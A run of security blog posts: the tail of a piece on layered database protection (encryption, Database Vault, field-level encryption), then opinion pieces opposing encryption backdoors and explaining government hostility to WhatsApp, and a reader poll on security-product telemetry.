At-rest data encryption that is built into the database protects sensitive data against this type of scenario. Even if someone has the database file, if it were encrypted, the file would essentially be useless. An attacker would have to implement an advanced crypto attack which would take enormous resources and time to conduct and is, for all intents and purposes, impractical. Encryption is a no-brainer. Some organizations use disk-layer encryption, which is OK in the event of lost or stolen disk. However, if a database file is moved to an unencrypted volume, it is no longer protected. In-database encryption improves security because the security stays with the file regardless of where it’s moved or exported. The data remains encrypted and inaccessible without the proper encryption keys regardless of where the database file is moved.

Layer 4: Apply Database Administrative Controls
Even with administrative permissions to the database, the researcher should not have been able to access the sensitive data.
I’m not aware of similar capabilities outside of Oracle database, but Oracle Database Vault would have also prevented this breach by implementing access controls within the database. Database Vault effectively segregates roles (enforces Separation of Duties) so that even an attacker with DBA permissions and access to the database file and encryption keys cannot run queries against the sensitive application data within the database because their role does not allow it. This role-based access, enforced within the database, is an extremely effective control to avoid accidental access that may occur throughout the course of daily database administration.

Layer 5: Protect Data Within the Database
Even with full authorization to application data, highly sensitive fields should be protected within the database.
Assuming all of the other layers break down and you have full access to the unencrypted database file and credentials that are authorized to access the sensitive application data, certain highly sensitive fields should be protected via application-tier encryption. Social Security Numbers and Passwords, for example, shouldn’t be stored in plain text. By applying protection for these fields at the app layer, even fully authorized users wouldn’t have access. We all know that passwords should be hashed so that the password field is only useful to the individual user who enters their correct password. But other fields, like SSN, can be encrypted at the app layer to protect against accidental exposure (human error), intentional insider attack, or exposed credentials (perhaps via phishing attack).

Maybe the vendor didn’t follow the proper protocols instituted by the organization. Maybe they made a human error; we all make mistakes. But, that’s why a layered approach to database security is critical on any database instances where sensitive production data resides. Security protocols shouldn’t require humans to make the right decisions. They should apply security best practices by default and without option.

Assuming this was a non-production database, any sensitive data should have been fully masked/replaced before it was even made available. And, if it was a production DB, database encryption and access control protections that stay with the database during export or if the database file is moved away from an encrypted volume should have been applied. The data should have been protected before the vendor's analyst ever got his/her hands on it. Oracle Database Vault would have prevented even a DBA-type user from being able to access the sensitive user data that was exposed here. These are not new technologies; they’ve been around for many years with plentiful documentation and industry awareness.

Unfortunately, a few of the early comments I read on this particular event were declarations or warnings about how this proves that cloud is less secure than on-premises deployments. I don’t agree. Many cloud services are configured with security by default and offer far more protection than company-owned data centers. Companies should seek cloud services that enable security by default and that offer layered security controls; more security than their own data centers. It’s more than selecting the right Cloud Service Provider. You also need to choose the right service; one that matches the specific needs (including security needs) of your current project. The top CSPs offer multiple IaaS and/or PaaS options that may meet the basic project requirements. While cloud computing grew popular because it’s easy and low cost, ease-of-use and cost are not always the most important factors when choosing the right cloud service. When sensitive data is involved, security needs to be weighed heavily when making service decisions.

I'll leave you with this. Today's computing landscape is extremely complex and constantly changing. But security controls are evolving to address what has been called the extended enterprise (which includes cloud computing and user mobility among other characteristics). Don't leave security in the hands of humans. And apply security in layers to cover as many potential attack vectors as possible. Enable security by default and apply automated checks to ensure that security configuration guidelines are being followed.

Note: Some of the content above is based on my understanding of Oracle security products (encryption, masking, CASB, etc.) Specific techniques or advantages mentioned may not apply to other vendors’ similar solutions.

Backdoors in messaging apps – what’s really going on?

We are in one of those phases again. The Paris attacks caused, once again, a cascade of demands for more surveillance and weakening of encryption. These demands appear every time, regardless of if the terrorists used encryption or not.

The perhaps most controversial demand is to make backdoors mandatory in communication software. Encryption technology can be practically unbreakable if implemented right. And the use of encryption has skyrocketed after the Snowden revelations. But encryption is not only used by terrorists. As a matter of fact, it’s one of the fundaments we are building our information society on. Protection against cybercrime, authentication of users, securing commerce, maintaining business secrets, protecting the lives of political dissidents, etc. etc. These are all critical functions that rely on encryption. So encryption is good, not bad. But as any good thing, it can be both used and misused.

And beside that. As people from the Americas prefer to express it: encryption is speech, referring to the First Amendment that grant people free speech. Both encryption technology and encrypted messages can be seen as information that people are free to exchange. Encryption technology is already out there and widely known. How on earth can anyone think that we could get this genie back in the bottle? Banning strongly encrypted messages would just harm ordinary citizens but not stopping terrorists from using secure communications, as they are known to disregard laws anyway. Banning encryption as an anti-terror measure would work just as well as simply banning terrorism. (* So can the pro-backdoor politicians really be that stupid and ignorant?

Well, that might not be the whole truth. But let’s first take a look at the big picture. What kind of tools do the surveillance agencies have to fight terrorism, or spy on their enemies or allies, or anybody else that happen to be of interest? The methods in their toolboxes can roughly be divided in three sections:

  • Tapping the wire. Reading the content of communications this way is becoming futile thanks to extensive use of encryption, but traffic analysis can still reveal who’s communicating with whom. People with unusual traffic patterns may also get attention at this level, despite the encryption.
  • Getting data from service provider’s systems. This usually reveals your network of contacts, and also the contents unless the service uses proper end-to-end encryption. This is where they want the backdoors.
  • Putting spying tools on the suspects’ devices. This can reveal pretty much everything the suspect is doing. But it’s not a scalable method and they must know whom to target before this method can be used.

And their main objectives:

  • Listen in to learn if a suspect really is planning an attack. This require access to message contents. This is where backdoors are supposed to help, according to the official story.
  • Mapping contact networks starting from a suspect. This requires metadata from the service providers or traffic analysis on the cable.
  • Finding suspects among all network users. This requires traffic analysis on the cable or data mining at the service providers’ end.

So forcing vendors to weaken end-to-end encryption would apparently make it easier to get message contents from the service providers. But as almost everyone understands, a program like this can never be water-tight. Even if the authorities could force companies like Apple, Google and WhatsApp to weaken security, others operating in another jurisdiction will always be able to provide secure solutions. And more skillful gangs could even use their own home-brewed encryption solutions. So what’s the point if we just weaken ordinary citizens’ security and let the criminals keep using strong cryptography? Actually, this is the real goal, even if it isn’t obvious at first.

Separating the interesting targets from the mass is the real goal in this effort. Strong crypto is in itself not the intelligence agencies’ main threat. It’s the trend that makes strong crypto a default in widely used communication apps. This makes it harder to identify the suspects in the first place as they can use the same tools and look no different from ordinary citizens.

Backdoors in the commonly used communication apps would however drive the primary targets towards more secure, or even customized, solutions. These solutions would of course not disappear. But the use of them would not be mainstream, and function as a signal that someone has a need for stronger security. This signal is the main benefit of a mandatory backdoor program.

But it is still not worth it, the price is far too high. Real-world metaphors are often a good way to describe IT issues. Imagine a society where the norm is to leave your home door unlocked. The police is walking around and checking all doors. They may peek inside to check what you are up to. And those with a locked door must have something to hide and are automatically suspects. Does this feel right? Would you like to live in a society like that? This is the IT-society some agencies and politicians want.


Safe surfing,


(* Yes, demanding backdoors and banning cryptography is not the same thing. But a backdoor is always a deliberate fault that makes an encryption system weaker. So it’s fair to say that demanding backdoors is equal to banning correctly implemented encryption.

Why Cameron hates WhatsApp so much

It’s a well-known fact that UK’s Prime Minister David Cameron doesn’t care much about peoples’ privacy. Recently he has been driving the so called Snooper’s Charter that would give authorities expanded surveillance powers, which got additional fuel from the Paris attacks.

It is said that terrorists want to tear down the Western society and lifestyle. And Cameron definitively puts himself in the same camp with statements like this:

“In our country, do we want to allow a means of communication between people which we cannot read? No, we must not.”
David Cameron

Note that he didn’t say terrorists, he said people. Kudos for the honesty. It’s a fact that terrorist blend in with the rest of the population and any attempt to weaken their security affects all of us. And it should be a no-brainer that a nation where the government can listen in on everybody is bad, at least if you have read Orwell’s Nineteen Eighty-Four.

But why does WhatsApp occur over and over as an example of something that gives the snoops grey hair? It’s a mainstream instant messenger app that wasn’t built for security. There are also similar apps that focus on security and privacy, like Telegram, Signal and Wickr. Why isn’t Cameron raging about them?

The answer is both simple and very significant. But it may not be obvious at fist. Internet was by default insecure and you had to use tools to fix that. The pre-Snowden era was the golden age for agencies tapping into the Internet backbone. Everything was open and unencrypted, except the really interesting stuff. Encryption itself became a signal that someone was of interest, and the authorities could use other means to find out what that person was up to.

More and more encryption is being built in by default now when we, thanks to Snowden, know the real state of things. A secured connection between client and server is becoming the norm for communication services. And many services are deploying end-to-end encryption. That means that messages are secured and opened by the communicating devices, not by the servers. Stuff stored on the servers are thus also safe from snoops. So yes, people with Cameron’s mindset have a real problem here. Correctly implemented end-to-end encryption can be next to impossible to break.

But there’s still one important thing that tapping the wire can reveal. That’s what communication tool you are using, and this is the important point. WhatsApp is a mainstream messenger with security. Telegram, Signal and Wickr are security messengers used by only a small group people with special needs. Traffic from both WhatsApp and Signal, for example, are encrypted. But the fact that you are using Signal is the important point. You stick out, just like encryption-users before.

WhatsApp is the prime target of Cameron’s wrath mainly because it is showing us how security will be implemented in the future. We are quickly moving towards a net where security is built in. Everyone will get decent security by default and minding your security will not make you a suspect anymore. And that’s great! We all need protection in a world with escalating cyber criminality.

WhatsApp is by no means a perfect security solution. The implementation of end-to-end encryption started in late 2014 and is still far from complete. The handling of metadata about users and communication is not very secure. And there are tricks the wire-snoops can use to map peoples’ network of contacts. So check it out thoroughly before you start using it for really hot stuff. But they seem to be on the path to become something unique. Among the first communication solutions that are easy to use, popular and secure by default.

Apple’s iMessage is another example. So easy that many are using it without knowing it, when they think they are sending SMS-messages. But iMessage’s security is unfortunately not flawless either.


Safe surfing,


PS. Yes, weakening security IS a bad idea. An excellent example is the TSA luggage locks, that have a master key that *used to be* secret.


Image by Sam Azgor

POLL – Is it OK for security products to collect data from your device?

We have a dilemma, and maybe you want to help us. I have written a lot about privacy and the trust relationship between users and software vendors. Users must trust the vendor to not misuse data that the software handles, but they have very poor abilities to base that trust on any facts. The vendor’s reputation is usually the most tangible thing available.

Vendors can be split into two camps based on their business model. The providers of “free” services, like Facebook and Google, must collect comprehensive data about the users to be able to run targeted marketing. The other camp, where we at F-Secure are, sells products that you pay money for. This camp does not have the need to profile users, so the privacy-threats should be smaller. But is that the whole picture?

No, not really. Vendors of paid products do not have the need to profile users for marketing. But there is still a lot of data on customers’ devices that may be relevant. The devices’ technical configuration is of course relevant when prioritizing maintenance. And knowing what features actually are used helps plan future releases. And we in the security field have additional interests. The prevalence of both clean and malicious files is important, as well as patterns related to malicious attacks. Just to name a few things.

One of our primary goals is to guard your privacy. But we could on the other hand benefit from data on your device. Or to be precise, you could benefit from letting us use that data as it contributes to better protection overall. So that’s our dilemma. How to utilize this data in a way that won’t put your privacy in jeopardy? And how to maintain trust? How to convince you that data we collect really is used to improve your protection?

Our policy for this is outlined here, and the anti-malware product’s data transfer is documented in detail in this document. In short, we only upload data necessary to produce the service, we focus on technical data and won’t take personal data, we use hashing of the data when feasible and we anonymize data so we can’t tell whom it came from.

The trend is clearly towards lighter devices that rely more on cloud services. Our answer to that is Security Cloud. It enables devices to off-load tasks to the cloud and benefit from data collected from the whole community. But to keep up with the threats we must develop Security Cloud constantly. And that also means that we will need more info about what happens on your device.

That’s why I would like to check what your opinion about data upload is. How do you feel about Security Cloud using data from your device to improve the overall security for all users? Do you trust us when we say that we apply strict rules to the data upload to guard your privacy?



Safe surfing,


Image by